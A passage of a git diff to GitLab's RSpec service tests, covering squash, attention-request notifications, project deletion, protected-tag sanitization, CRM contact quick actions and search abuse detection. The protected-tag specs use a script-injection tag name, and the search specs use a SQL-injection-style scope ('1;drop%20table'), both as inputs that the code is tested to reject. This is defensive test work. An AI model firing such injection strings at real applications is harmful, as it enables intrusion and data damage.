expect_any_instance_of(MergeRequests::BaseService).not_to receive(:execute_hooks) + + subject.execute(merge_request) + end end context "when all discussions are resolved" do @@ -44,6 +50,12 @@ RSpec.describe MergeRequests::ResolvedDiscussionNotificationService do subject.execute(merge_request) end + + it "sends a webhook" do + expect_any_instance_of(MergeRequests::BaseService).to receive(:execute_hooks).with(merge_request, 'update') + + subject.execute(merge_request) + end end end end diff --git a/spec/services/merge_requests/squash_service_spec.rb b/spec/services/merge_requests/squash_service_spec.rb index 09f83624e05..af48e8f5dae 100644 --- a/spec/services/merge_requests/squash_service_spec.rb +++ b/spec/services/merge_requests/squash_service_spec.rb @@ -55,18 +55,26 @@ RSpec.describe MergeRequests::SquashService do expect(merge_request).to receive(:commits_count).at_least(:once).and_return(1) end - it 'will skip performing the squash, as the outcome would be the same' do - expect(merge_request.target_project.repository).not_to receive(:squash) + it 'will still perform the squash' do + expect(merge_request.target_project.repository).to receive(:squash).and_return('sha') service.execute end - it 'will still perform the squash when a custom squash commit message has been provided' do - service = described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: 'A custom commit message' }) + context 'when squash message matches commit message' do + let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message }) } - expect(merge_request.target_project.repository).to receive(:squash).and_return('sha') + it 'returns that commit SHA' do + result = service.execute - service.execute + expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha) + end + + it 'does not perform any git actions' do + expect(repository).not_to receive(:squash) + + service.execute + end end end @@ -113,17 +121,7 @@ RSpec.describe MergeRequests::SquashService do context 'when there is only one commit in the merge request' do let(:merge_request) { merge_request_with_one_commit } - it 'returns that commit SHA' do - result = service.execute - - expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha) - end - - it 'does not perform any git actions' do - expect(repository).not_to receive(:popen) - - service.execute - end + include_examples 'the squash succeeds' end context 'when squashing only new files' do diff --git a/spec/services/merge_requests/toggle_attention_requested_service_spec.rb b/spec/services/merge_requests/toggle_attention_requested_service_spec.rb index a26b1be529e..63fa61b8097 100644 --- a/spec/services/merge_requests/toggle_attention_requested_service_spec.rb +++ b/spec/services/merge_requests/toggle_attention_requested_service_spec.rb @@ -13,9 +13,14 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } let(:result) { service.execute } let(:todo_service) { spy('todo service') } + let(:notification_service) { spy('notification service') } before do + allow(NotificationService).to receive(:new) { notification_service } allow(service).to receive(:todo_service).and_return(todo_service) + allow(service).to receive(:notification_service).and_return(notification_service) + allow(SystemNoteService).to receive(:request_attention) + allow(SystemNoteService).to receive(:remove_attention_request) project.add_developer(current_user) project.add_developer(user) @@ -59,6 +64,20 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'sends email to reviewer' do + expect(notification_service).to receive_message_chain(:async, :attention_requested_of_merge_request).with(merge_request, current_user, user) + + service.execute + end + + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: current_user, merge_request: merge_request, user: current_user) + .and_call_original + + service.execute + end end context 'assignee exists' do @@ -84,6 +103,20 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'creates a request attention system note' do + expect(SystemNoteService).to receive(:request_attention).with(merge_request, merge_request.project, current_user, assignee_user) + + service.execute + end + + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: current_user, merge_request: merge_request, user: current_user) + .and_call_original + + service.execute + end end context 'assignee is the same as reviewer' do @@ -123,6 +156,12 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'creates a remove attention request system note' do + expect(SystemNoteService).to receive(:remove_attention_request).with(merge_request, merge_request.project, current_user, user) + + service.execute + end end end end diff --git a/spec/services/notification_service_spec.rb b/spec/services/notification_service_spec.rb index fbf5b183365..24775ce06a4 100644 --- a/spec/services/notification_service_spec.rb +++ b/spec/services/notification_service_spec.rb @@ -2425,6 +2425,45 @@ RSpec.describe NotificationService, :mailer do let(:notification_trigger) { notification.review_requested_of_merge_request(merge_request, current_user, reviewer) } end end + + describe '#attention_requested_of_merge_request' do + let_it_be(:current_user) { create(:user) } + let_it_be(:reviewer) { create(:user) } + let_it_be(:merge_request) { create(:merge_request, source_project: project, reviewers: [reviewer]) } + + it 'sends email to reviewer', :aggregate_failures do + notification.attention_requested_of_merge_request(merge_request, current_user, reviewer) + + merge_request.reviewers.each { |reviewer| should_email(reviewer) } + should_not_email(merge_request.author) + should_not_email(@u_watcher) + should_not_email(@u_participant_mentioned) + should_not_email(@subscriber) + should_not_email(@watcher_and_subscriber) + should_not_email(@u_guest_watcher) + should_not_email(@u_guest_custom) + should_not_email(@u_custom_global) + should_not_email(@unsubscriber) + should_not_email(@u_participating) + should_not_email(@u_disabled) + should_not_email(@u_lazy_participant) + end + + it 'adds "attention requested" reason' do + notification.attention_requested_of_merge_request(merge_request, current_user, [reviewer]) + + merge_request.reviewers.each do |reviewer| + email = find_email_for(reviewer) + + expect(email).to have_header('X-GitLab-NotificationReason', NotificationReason::ATTENTION_REQUESTED) + end + end + + it_behaves_like 'project emails are disabled' do + let(:notification_target) { merge_request } + let(:notification_trigger) { notification.attention_requested_of_merge_request(merge_request, current_user, reviewer) } + end + end end describe 'Projects', :deliver_mails_inline do diff --git a/spec/services/packages/debian/update_distribution_service_spec.rb b/spec/services/packages/debian/update_distribution_service_spec.rb index 2aa34a62111..3dff2754cec 100644 --- a/spec/services/packages/debian/update_distribution_service_spec.rb +++ b/spec/services/packages/debian/update_distribution_service_spec.rb @@ -61,9 +61,9 @@ RSpec.describe Packages::Debian::UpdateDistributionService do let_it_be(:architecture0) { create("debian_#{container_type}_architecture", distribution: distribution, name: 'all') } let_it_be(:architecture1) { create("debian_#{container_type}_architecture", distribution: distribution, name: 'architecture1') } let_it_be(:architecture2) { create("debian_#{container_type}_architecture", distribution: distribution, name: 'architecture2') } - let_it_be(:component_file1) { create("debian_#{container_type}_component_file", :source, component: component1) } + let_it_be(:component_file1) { create("debian_#{container_type}_component_file", :sources, component: component1) } let_it_be(:component_file2) { create("debian_#{container_type}_component_file", component: component1, architecture: architecture1) } - let_it_be(:component_file3) { create("debian_#{container_type}_component_file", :source, component: component2) } + let_it_be(:component_file3) { create("debian_#{container_type}_component_file", :sources, component: component2) } let_it_be(:component_file4) { create("debian_#{container_type}_component_file", component: component2, architecture: architecture2) } let(:original_params) do diff --git a/spec/services/packages/npm/create_package_service_spec.rb b/spec/services/packages/npm/create_package_service_spec.rb index b1beb2adb3b..3bb675058df 100644 --- a/spec/services/packages/npm/create_package_service_spec.rb +++ b/spec/services/packages/npm/create_package_service_spec.rb @@ -89,17 +89,6 @@ RSpec.describe Packages::Npm::CreatePackageService do end end end - - context 'with packages_npm_abbreviated_metadata disabled' do - before do - stub_feature_flags(packages_npm_abbreviated_metadata: false) - end - - it 'creates a package without metadatum' do - expect { subject } - .not_to change { Packages::Npm::Metadatum.count } - end - end end describe '#execute' do diff --git a/spec/services/projects/destroy_service_spec.rb b/spec/services/projects/destroy_service_spec.rb index ac84614121a..b22f276ee1f 100644 --- a/spec/services/projects/destroy_service_spec.rb +++ b/spec/services/projects/destroy_service_spec.rb @@ -55,48 +55,16 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do .and change { Ci::Pipeline.count }.by(-1) end - context 'with abort_deleted_project_pipelines disabled' do - stub_feature_flags(abort_deleted_project_pipelines: false) + it 'avoids N+1 queries' do + recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } + project = create(:project, :repository, namespace: user.namespace) + pipeline = create(:ci_pipeline, project: project) + builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) + create(:ci_pipeline_artifact, pipeline: pipeline) + create_list(:ci_build_trace_chunk, 3, build: builds[0]) - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create(:ci_pipeline_artifact, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end - end - - context 'with ci_optimize_project_records_destruction disabled' do - stub_feature_flags(ci_optimize_project_records_destruction: false) - - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end - end - - context 'with ci_optimize_project_records_destruction and abort_deleted_project_pipelines enabled' do - it 'avoids N+1 queries' do - recorder = ActiveRecord::QueryRecorder.new { destroy_project(project, user, {}) } - - project = create(:project, :repository, namespace: user.namespace) - pipeline = create(:ci_pipeline, project: project) - builds = create_list(:ci_build, 3, :artifacts, pipeline: pipeline) - create_list(:ci_build_trace_chunk, 3, build: builds[0]) - - expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) - end + expect { destroy_project(project, project.owner, {}) }.not_to exceed_query_limit(recorder) end it_behaves_like 'deleting the project' @@ -132,64 +100,22 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do destroy_project(project, user, {}) end - context 'with abort_deleted_project_pipelines feature disabled' do - before do - stub_feature_flags(abort_deleted_project_pipelines: false) - end - - it 'does not bulk-fail project ci pipelines' do - expect(::Ci::AbortPipelinesService).not_to receive(:new) - - destroy_project(project, user, {}) - end - - it 'does not destroy CI records via DestroyPipelineService' do - expect(::Ci::DestroyPipelineService).not_to receive(:new) - - destroy_project(project, user, {}) - end - end - - context 'with abort_deleted_project_pipelines feature enabled' do + context 'with running pipelines' do let!(:pipelines) { create_list(:ci_pipeline, 3, :running, project: project) } let(:destroy_pipeline_service) { double('DestroyPipelineService', execute: nil) } - context 'with ci_optimize_project_records_destruction disabled' do - before do - stub_feature_flags(ci_optimize_project_records_destruction: false) - end - - it 'bulk-fails project ci pipelines' do - expect(::Ci::AbortPipelinesService) - .to receive_message_chain(:new, :execute) - .with(project.all_pipelines, :project_deleted) - - destroy_project(project, user, {}) - end + it 'bulks-fails with AbortPipelineService and then executes DestroyPipelineService for each pipelines' do + allow(::Ci::DestroyPipelineService).to receive(:new).and_return(destroy_pipeline_service) - it 'does not destroy CI records via DestroyPipelineService' do - expect(::Ci::DestroyPipelineService).not_to receive(:new) + expect(::Ci::AbortPipelinesService) + .to receive_message_chain(:new, :execute) + .with(project.all_pipelines, :project_deleted) - destroy_project(project, user, {}) + pipelines.each do |pipeline| + expect(destroy_pipeline_service).to receive(:execute).with(pipeline) end - end - - context 'with ci_optimize_project_records_destruction enabled' do - it 'executes DestroyPipelineService for project ci pipelines' do - allow(::Ci::DestroyPipelineService).to receive(:new).and_return(destroy_pipeline_service) - expect(::Ci::AbortPipelinesService) - .to receive_message_chain(:new, :execute) - .with(project.all_pipelines, :project_deleted) - - pipelines.each do |pipeline| - expect(destroy_pipeline_service) - .to receive(:execute) - .with(pipeline) - end - - destroy_project(project, user, {}) - end + destroy_project(project, user, {}) end end @@ -545,6 +471,27 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do end end + context 'when project has events' do + let!(:event) { create(:event, :created, project: project, target: project, author: user) } + + it 'deletes events from the project' do + expect do + destroy_project(project, user) + end.to change(Event, :count).by(-1) + end + + context 'when an error is returned while deleting events' do + it 'does not delete project' do + allow_next_instance_of(Events::DestroyService) do |instance| + allow(instance).to receive(:execute).and_return(ServiceResponse.error(message: 'foo')) + end + + expect(destroy_project(project, user)).to be_falsey + expect(project.delete_error).to include('Failed to remove events') + end + end + end + context 'error while destroying', :sidekiq_inline do let!(:pipeline) { create(:ci_pipeline, project: project) } let!(:builds) { create_list(:ci_build, 2, :artifacts, pipeline: pipeline) } diff --git a/spec/services/projects/prometheus/alerts/create_service_spec.rb b/spec/services/projects/prometheus/alerts/create_service_spec.rb index c0bc9336558..6b9d43e4e81 100644 --- a/spec/services/projects/prometheus/alerts/create_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/create_service_spec.rb @@ -6,7 +6,7 @@ RSpec.describe Projects::Prometheus::Alerts::CreateService do let_it_be(:project) { create(:project) } let_it_be(:user) { create(:user) } - let(:service) { described_class.new(project, user, params) } + let(:service) { described_class.new(project: project, current_user: user, params: params) } subject { service.execute } diff --git a/spec/services/projects/prometheus/alerts/destroy_service_spec.rb b/spec/services/projects/prometheus/alerts/destroy_service_spec.rb index 573711051b7..a3e9c3516c2 100644 --- a/spec/services/projects/prometheus/alerts/destroy_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/destroy_service_spec.rb @@ -7,7 +7,7 @@ RSpec.describe Projects::Prometheus::Alerts::DestroyService do let_it_be(:user) { create(:user) } let_it_be(:alert) { create(:prometheus_alert, project: project) } - let(:service) { described_class.new(project, user, nil) } + let(:service) { described_class.new(project: project, current_user: user, params: nil) } describe '#execute' do subject { service.execute(alert) } diff --git a/spec/services/projects/prometheus/alerts/update_service_spec.rb b/spec/services/projects/prometheus/alerts/update_service_spec.rb index e831d001838..ec6766221f6 100644 --- a/spec/services/projects/prometheus/alerts/update_service_spec.rb +++ b/spec/services/projects/prometheus/alerts/update_service_spec.rb @@ -11,7 +11,7 @@ RSpec.describe Projects::Prometheus::Alerts::UpdateService do create(:prometheus_alert, project: project, environment: environment) end - let(:service) { described_class.new(project, user, params) } + let(:service) { described_class.new(project: project, current_user: user, params: params) } let(:params) do { diff --git a/spec/services/projects/transfer_service_spec.rb b/spec/services/projects/transfer_service_spec.rb index c47d44002cc..ddd16100b40 100644 --- a/spec/services/projects/transfer_service_spec.rb +++ b/spec/services/projects/transfer_service_spec.rb @@ -169,7 +169,7 @@ RSpec.describe Projects::TransferService do end end - context 'when project has pending builds' do + context 'when project has pending builds', :sidekiq_inline do let!(:other_project) { create(:project) } let!(:pending_build) { create(:ci_pending_build, project: project.reload) } let!(:unrelated_pending_build) { create(:ci_pending_build, project: other_project) } @@ -251,7 +251,7 @@ RSpec.describe Projects::TransferService do ) end - context 'when project has pending builds' do + context 'when project has pending builds', :sidekiq_inline do let!(:other_project) { create(:project) } let!(:pending_build) { create(:ci_pending_build, project: project.reload) } let!(:unrelated_pending_build) { create(:ci_pending_build, project: other_project) } diff --git a/spec/services/protected_tags/create_service_spec.rb b/spec/services/protected_tags/create_service_spec.rb index e85a43eb51c..3d06cc9fb6c 100644 --- a/spec/services/protected_tags/create_service_spec.rb +++ b/spec/services/protected_tags/create_service_spec.rb @@ -7,17 +7,54 @@ RSpec.describe ProtectedTags::CreateService do let(:user) { project.owner } let(:params) do { - name: 'master', + name: name, create_access_levels_attributes: [{ access_level: Gitlab::Access::MAINTAINER }] } end describe '#execute' do + let(:name) { 'tag' } + subject(:service) { described_class.new(project, user, params) } it 'creates a new protected tag' do expect { service.execute }.to change(ProtectedTag, :count).by(1) expect(project.protected_tags.last.create_access_levels.map(&:access_level)).to eq([Gitlab::Access::MAINTAINER]) end + + context 'when name has escaped HTML' do + let(:name) { 'tag->test' } + + it 'creates the new protected tag matching the unescaped version' do + expect { service.execute }.to change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag->test') + end + + context 'and name contains HTML tags' do + let(:name) { '<b>tag</b>' } + + it 'creates the new protected tag with sanitized name' do + expect { service.execute }.to change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag') + end + + context 'and contains unsafe HTML' do + let(:name) { '<script>alert('foo');</script>' } + + it 'does not create the new protected tag' do + expect { service.execute }.not_to change(ProtectedTag, :count) + end + end + end + + context 'when name contains unescaped HTML tags' do + let(:name) { '<b>tag</b>' } + + it 'creates the new protected tag with sanitized name' do + expect { service.execute }.to change(ProtectedTag, :count).by(1) + expect(project.protected_tags.last.name).to eq('tag') + end + end + end end end diff --git a/spec/services/protected_tags/update_service_spec.rb b/spec/services/protected_tags/update_service_spec.rb index ed151ca2347..22005bb9b89 100644 --- a/spec/services/protected_tags/update_service_spec.rb +++ b/spec/services/protected_tags/update_service_spec.rb @@ -6,17 +6,50 @@ RSpec.describe ProtectedTags::UpdateService do let(:protected_tag) { create(:protected_tag) } let(:project) { protected_tag.project } let(:user) { project.owner } - let(:params) { { name: 'new protected tag name' } } + let(:params) { { name: new_name } } describe '#execute' do + let(:new_name) { 'new protected tag name' } + let(:result) { service.execute(protected_tag) } + subject(:service) { described_class.new(project, user, params) } it 'updates a protected tag' do - result = service.execute(protected_tag) - expect(result.reload.name).to eq(params[:name]) end + context 'when name has escaped HTML' do + let(:new_name) { 'tag->test' } + + it 'updates protected tag name with unescaped HTML' do + expect(result.reload.name).to eq('tag->test') + end + + context 'and name contains HTML tags' do + let(:new_name) { '<b>tag</b>' } + + it 'updates protected tag name with sanitized name' do + expect(result.reload.name).to eq('tag') + end + + context 'and contains unsafe HTML' do + let(:new_name) { '<script>alert('foo');</script>' } + + it 'does not update the protected tag' do + expect(result.reload.name).to eq(protected_tag.name) + end + end + end + end + + context 'when name contains unescaped HTML tags' do + let(:new_name) { '<b>tag</b>' } + + it 'updates protected tag name with sanitized name' do + expect(result.reload.name).to eq('tag') + end + end + context 'without admin_project permissions' do let(:user) { create(:user) } diff --git a/spec/services/quick_actions/interpret_service_spec.rb b/spec/services/quick_actions/interpret_service_spec.rb index 611261cd92c..77d263f4b70 100644 --- a/spec/services/quick_actions/interpret_service_spec.rb +++ b/spec/services/quick_actions/interpret_service_spec.rb @@ -3,7 +3,8 @@ require 'spec_helper' RSpec.describe QuickActions::InterpretService do - let_it_be(:public_project) { create(:project, :public) } + let_it_be(:group) { create(:group) } + let_it_be(:public_project) { create(:project, :public, group: group) } let_it_be(:repository_project) { create(:project, :repository) } let_it_be(:project) { public_project } let_it_be(:developer) { create(:user) } @@ -2233,6 +2234,51 @@ RSpec.describe QuickActions::InterpretService do end end end + + context 'crm_contact commands' do + let_it_be(:new_contact) { create(:contact, group: group) } + let_it_be(:existing_contact) { create(:contact, group: group) } + + let(:add_command) { service.execute("/add_contacts #{new_contact.email}", issue) } + let(:remove_command) { service.execute("/remove_contacts #{existing_contact.email}", issue) } + + before do + issue.project.group.add_developer(developer) + create(:issue_customer_relations_contact, issue: issue, contact: existing_contact) + end + + context 'with feature flag disabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it 'add_contacts command does not add the contact' do + _, updates, _ = add_command + + expect(updates).to be_empty + end + + it 'remove_contacts command does not remove the contact' do + _, updates, _ = remove_command + + expect(updates).to be_empty + end + end + + it 'add_contacts command adds the contact' do + _, updates, message = add_command + + expect(updates).to eq(add_contacts: [new_contact.email]) + expect(message).to eq('One or more contacts were successfully added.') + end + + it 'remove_contacts command removes the contact' do + _, updates, message = remove_command + + expect(updates).to eq(remove_contacts: [existing_contact.email]) + expect(message).to eq('One or more contacts were successfully removed.') + end + end end describe '#explain' do diff --git a/spec/services/repositories/changelog_service_spec.rb b/spec/services/repositories/changelog_service_spec.rb index b547ae17317..ddb8e7e1182 100644 --- a/spec/services/repositories/changelog_service_spec.rb +++ b/spec/services/repositories/changelog_service_spec.rb @@ -61,6 +61,8 @@ RSpec.describe Repositories::ChangelogService do let!(:commit2) { project.commit(sha3) } let!(:commit3) { project.commit(sha4) } + let(:commit_to_changelog) { true } + it 'generates and commits a changelog section' do allow(MergeRequestDiffCommit) .to receive(:oldest_merge_request_id_per_commit) @@ -73,7 +75,7 @@ RSpec.describe Repositories::ChangelogService do service = described_class .new(project, creator, version: '1.0.0', from: sha1, to: sha3) - recorder = ActiveRecord::QueryRecorder.new { service.execute } + recorder = ActiveRecord::QueryRecorder.new { service.execute(commit_to_changelog: commit_to_changelog) } changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data expect(recorder.count).to eq(9) @@ -90,7 +92,7 @@ RSpec.describe Repositories::ChangelogService do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data @@ -108,7 +110,7 @@ RSpec.describe Repositories::ChangelogService do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data @@ -119,12 +121,33 @@ RSpec.describe Repositories::ChangelogService do it 'uses the target branch when "to" is unspecified' do described_class .new(project, creator, version: '1.0.0', from: sha1) - .execute + .execute(commit_to_changelog: commit_to_changelog) changelog = project.repository.blob_at('master', 'CHANGELOG.md')&.data expect(changelog).to include('Title 1', 'Title 2', 'Title 3') end + + describe 'with commit_to_changelog: false' do + let(:commit_to_changelog) { false } + + it 'generates changelog section' do + allow(MergeRequestDiffCommit) + .to receive(:oldest_merge_request_id_per_commit) + .with(project.id, [commit2.id, commit1.id]) + .and_return([ + { sha: sha2, merge_request_id: mr1.id }, + { sha: sha3, merge_request_id: mr2.id } + ]) + + service = described_class + .new(project, creator, version: '1.0.0', from: sha1, to: sha3) + + changelog = service.execute(commit_to_changelog: commit_to_changelog) + + expect(changelog).to include('Title 1', 'Title 2') + end + end end describe '#start_of_commit_range' do diff --git a/spec/services/search_service_spec.rb b/spec/services/search_service_spec.rb index 40fb257b23e..d7a36ff370e 100644 --- a/spec/services/search_service_spec.rb +++ b/spec/services/search_service_spec.rb @@ -20,6 +20,7 @@ RSpec.describe SearchService do let(:page) { 1 } let(:per_page) { described_class::DEFAULT_PER_PAGE } + let(:valid_search) { "what is love?" } subject(:search_service) { described_class.new(user, search: search, scope: scope, page: page, per_page: per_page) } @@ -30,7 +31,7 @@ RSpec.describe SearchService do describe '#project' do context 'when the project is accessible' do it 'returns the project' do - project = described_class.new(user, project_id: accessible_project.id).project + project = described_class.new(user, project_id: accessible_project.id, search: valid_search).project expect(project).to eq accessible_project end @@ -39,7 +40,7 @@ RSpec.describe SearchService do search_project = create :project search_project.add_guest(user) - project = described_class.new(user, project_id: search_project.id).project + project = described_class.new(user, project_id: search_project.id, search: valid_search).project expect(project).to eq search_project end @@ -47,7 +48,7 @@ RSpec.describe SearchService do context 'when the project is not accessible' do it 'returns nil' do - project = described_class.new(user, project_id: inaccessible_project.id).project + project = described_class.new(user, project_id: inaccessible_project.id, search: valid_search).project expect(project).to be_nil end @@ -55,7 +56,7 @@ RSpec.describe SearchService do context 'when there is no project_id' do it 'returns nil' do - project = described_class.new(user).project + project = described_class.new(user, search: valid_search).project expect(project).to be_nil end @@ -65,7 +66,7 @@ RSpec.describe SearchService do describe '#group' do context 'when the group is accessible' do it 'returns the group' do - group = described_class.new(user, group_id: accessible_group.id).group + group = described_class.new(user, group_id: accessible_group.id, search: valid_search).group expect(group).to eq accessible_group end @@ -73,7 +74,7 @@ RSpec.describe SearchService do context 'when the group is not accessible' do it 'returns nil' do - group = described_class.new(user, group_id: inaccessible_group.id).group + group = described_class.new(user, group_id: inaccessible_group.id, search: valid_search).group expect(group).to be_nil end @@ -81,7 +82,7 @@ RSpec.describe SearchService do context 'when there is no group_id' do it 'returns nil' do - group = described_class.new(user).group + group = described_class.new(user, search: valid_search).group expect(group).to be_nil end @@ -118,7 +119,7 @@ RSpec.describe SearchService do context 'with accessible project_id' do context 'and allowed scope' do it 'returns the specified scope' do - scope = described_class.new(user, project_id: accessible_project.id, scope: 'notes').scope + scope = described_class.new(user, project_id: accessible_project.id, scope: 'notes', search: valid_search).scope expect(scope).to eq 'notes' end @@ -126,7 +127,7 @@ RSpec.describe SearchService do context 'and disallowed scope' do it 'returns the default scope' do - scope = described_class.new(user, project_id: accessible_project.id, scope: 'projects').scope + scope = described_class.new(user, project_id: accessible_project.id, scope: 'projects', search: valid_search).scope expect(scope).to eq 'blobs' end @@ -134,7 +135,7 @@ RSpec.describe SearchService do context 'and no scope' do it 'returns the default scope' do - scope = described_class.new(user, project_id: accessible_project.id).scope + scope = described_class.new(user, project_id: accessible_project.id, search: valid_search).scope expect(scope).to eq 'blobs' end @@ -552,4 +553,87 @@ RSpec.describe SearchService do end end end + + describe '#valid_request?' do + let(:scope) { 'issues' } + let(:search) { 'foobar' } + let(:params) { instance_double(Gitlab::Search::Params) } + + before do + allow(Gitlab::Search::Params).to receive(:new).and_return(params) + allow(params).to receive(:valid?).and_return double(:valid?) + end + + it 'is the return value of params.valid?' do + expect(subject.valid_request?).to eq(params.valid?) + end + end + + describe '#abuse_messages' do + let(:scope) { 'issues' } + let(:search) { 'foobar' } + let(:params) { instance_double(Gitlab::Search::Params) } + + before do + allow(Gitlab::Search::Params).to receive(:new).and_return(params) + end + + it 'returns an empty array when not abusive' do + allow(params).to receive(:abusive?).and_return false + expect(subject.abuse_messages).to match_array([]) + end + + it 'calls on abuse_detection.errors.full_messages when abusive' do + allow(params).to receive(:abusive?).and_return true + expect(params).to receive_message_chain(:abuse_detection, :errors, :full_messages) + subject.abuse_messages + end + end + + describe 'abusive search handling' do + subject { described_class.new(user, raw_params) } + + let(:raw_params) { { search: search, scope: scope } } + let(:search) { 'foobar' } + + let(:search_service) { double(:search_service) } + + before do + stub_feature_flags(prevent_abusive_searches: should_detect_abuse) + expect(Gitlab::Search::Params).to receive(:new) + .with(raw_params, detect_abuse: should_detect_abuse).and_call_original + + allow(subject).to receive(:search_service).and_return search_service + end + + context 'when abusive search but prevent_abusive_searches FF is disabled' do + let(:should_detect_abuse) { false } + let(:scope) { '1;drop%20table' } + + it 'executes search even if params are abusive' do + expect(search_service).to receive(:execute) + subject.search_results + end + end + + context 'a search is abusive' do + let(:should_detect_abuse) { true } + let(:scope) { '1;drop%20table' } + + it 'does NOT execute search service' do + expect(search_service).not_to receive(:execute) + subject.search_results + end + end + + context 'a search is NOT abusive' do + let(:should_detect_abuse) { true } + let(:scope) { 'issues' } + + it 'executes search service' do + expect(search_service).to receive(:execute) + subject.search_results + end + end + end end diff --git a/spec/services/service_ping/submit_service_ping_service_spec.rb b/spec/services/service_ping/submit_service_ping_service_spec.rb index d8672eec682..ca387690e83 100644 --- a/spec/services/service_ping/submit_service_ping_service_spec.rb +++ b/spec/services/service_ping/submit_service_ping_service_spec.rb @@ -322,6 +322,25 @@ RSpec.describe ServicePing::SubmitService do expect { subject.execute }.to raise_error(described_class::SubmissionError) end end + + context 'when skip_db_write passed to service' do + let(:subject) { ServicePing::SubmitService.new(skip_db_write: true) } + + before do + stub_response(body: with_dev_ops_score_params) + end + + it 'does not save RawUsageData' do + expect { subject.execute } + .not_to change { RawUsageData.count } + end + + it 'does not call DevOpsReport service' do + expect(ServicePing::DevopsReportService).not_to receive(:new) + + subject.execute + end + end end describe '#url' do diff --git a/spec/services/system_note_service_spec.rb b/spec/services/system_note_service_spec.rb index ce0122ae301..3ec2c71b20c 100644 --- a/spec/services/system_note_service_spec.rb +++ b/spec/services/system_note_service_spec.rb @@ -146,6 +146,30 @@ RSpec.describe SystemNoteService do end end + describe '.request_attention' do + let(:user) { double } + + it 'calls IssuableService' do + expect_next_instance_of(::SystemNotes::IssuablesService) do |service| + expect(service).to receive(:request_attention).with(user) + end + + described_class.request_attention(noteable, project, author, user) + end + end + + describe '.remove_attention_request' do + let(:user) { double } + + it 'calls IssuableService' do + expect_next_instance_of(::SystemNotes::IssuablesService) do |service| + expect(service).to receive(:remove_attention_request).with(user) + end + + described_class.remove_attention_request(noteable, project, author, user) + end + end + describe '.merge_when_pipeline_succeeds' do it 'calls MergeRequestsService' do sha = double @@ -287,38 +311,38 @@ RSpec.describe SystemNoteService do end describe '.cross_reference' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference).with(mentioner) + expect(service).to receive(:cross_reference).with(mentioned_in) end - described_class.cross_reference(double, mentioner, double) + described_class.cross_reference(double, mentioned_in, double) end end describe '.cross_reference_disallowed?' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference_disallowed?).with(mentioner) + expect(service).to receive(:cross_reference_disallowed?).with(mentioned_in) end - described_class.cross_reference_disallowed?(double, mentioner) + described_class.cross_reference_disallowed?(double, mentioned_in) end end describe '.cross_reference_exists?' do - let(:mentioner) { double } + let(:mentioned_in) { double } it 'calls IssuableService' do expect_next_instance_of(::SystemNotes::IssuablesService) do |service| - expect(service).to receive(:cross_reference_exists?).with(mentioner) + expect(service).to receive(:cross_reference_exists?).with(mentioned_in) end - described_class.cross_reference_exists?(double, mentioner) + described_class.cross_reference_exists?(double, mentioned_in) end end diff --git a/spec/services/system_notes/commit_service_spec.rb b/spec/services/system_notes/commit_service_spec.rb index bd6b3ec953a..0399603980d 100644 --- a/spec/services/system_notes/commit_service_spec.rb +++ b/spec/services/system_notes/commit_service_spec.rb @@ -57,7 +57,7 @@ RSpec.describe SystemNotes::CommitService do end context 'with multiple existing commits' do - let(:old_commits) { noteable.commits[3..-1] } + let(:old_commits) { noteable.commits[3..] } context 'with oldrev' do let(:oldrev) { noteable.commits[2].id } diff --git a/spec/services/system_notes/issuables_service_spec.rb b/spec/services/system_notes/issuables_service_spec.rb index fd481aa6ddb..7e53e66303b 100644 --- a/spec/services/system_notes/issuables_service_spec.rb +++ b/spec/services/system_notes/issuables_service_spec.rb @@ -199,6 +199,42 @@ RSpec.describe ::SystemNotes::IssuablesService do end end + describe '#request_attention' do + subject { service.request_attention(user) } + + 